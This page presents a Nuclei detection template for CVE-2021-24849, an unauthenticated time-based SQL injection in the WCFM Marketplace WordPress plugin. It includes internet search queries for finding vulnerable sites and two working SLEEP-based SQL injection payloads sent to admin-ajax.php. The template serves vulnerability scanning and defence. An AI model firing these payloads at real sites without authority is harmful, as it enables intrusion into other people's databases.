WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection

ID: CVE-2021-24849

Severity: critical

Author: ritikchaddha

Tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers

Description

The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.

YAML Source

id: CVE-2021-24849

info:
  name: WCFM WooCommerce Multivendor Marketplace < 3.4.12 - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The wcfm_ajax_controller AJAX action of the WCFM Marketplace WordPress plugin before 3.4.12, available to unauthenticated and authenticated user, does not properly sanitise multiple parameters before using them in SQL statements, leading to SQL injections.
  remediation: Fixed in 3.4.12
  reference:
    - https://wpscan.com/vulnerability/763c08a0-4b2b-4487-b91c-be6cc2b9322e/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-24849
    - https://wordpress.org/plugins/wc-multivendor-marketplace/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24849
    cwe-id: CWE-89
    epss-score: 0.02367
    epss-percentile: 0.89814
    cpe: cpe:2.3:a:wclovers:frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: wclovers
    product: frontend_manager_for_woocommerce_along_with_bookings_subscription_listings_compatible
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/wc-multivendor-marketplace
    fofa-query: body=/wp-content/plugins/wc-multivendor-marketplace
    publicwww-query: "/wp-content/plugins/wc-multivendor-marketplace"
  tags: time-based-sqli,wpscan,cve,cve2021,wp,wp-plugin,wordpress,wc-multivendor-marketplace,sqli,wclovers
flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/wc-multivendor-marketplace/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, "WCFM Marketplace - Best Multivendor Marketplace for WooCommerce")
        condition: and
        internal: true

  - raw:
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        {{post_data}}

    payloads:
      post_data:
        - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1+union+select+1+and+sleep(5)--"
        - "action=wcfm_ajax_controller&controller=wcfm-refund-requests&transaction_id=1&orderby=ID`%20AND%20(SELECT%2042%20FROM%20(SELECT(SLEEP(5)))b)--%20`"

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
          - 'duration>=5'
          - 'status_code == 200'
          - 'contains(header, "application/json")'
          - 'contains(body, "success")'
        condition: and
# digest: 490a0046304402204207cad197e3e9c9e9537475a487cd69f15a375df62acde46500ba8e3b1326fd02206985940447360abc566ff343597e92209c602c4384b4eb0c66f78f0721b4ae02:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-24849.yaml"

View on Github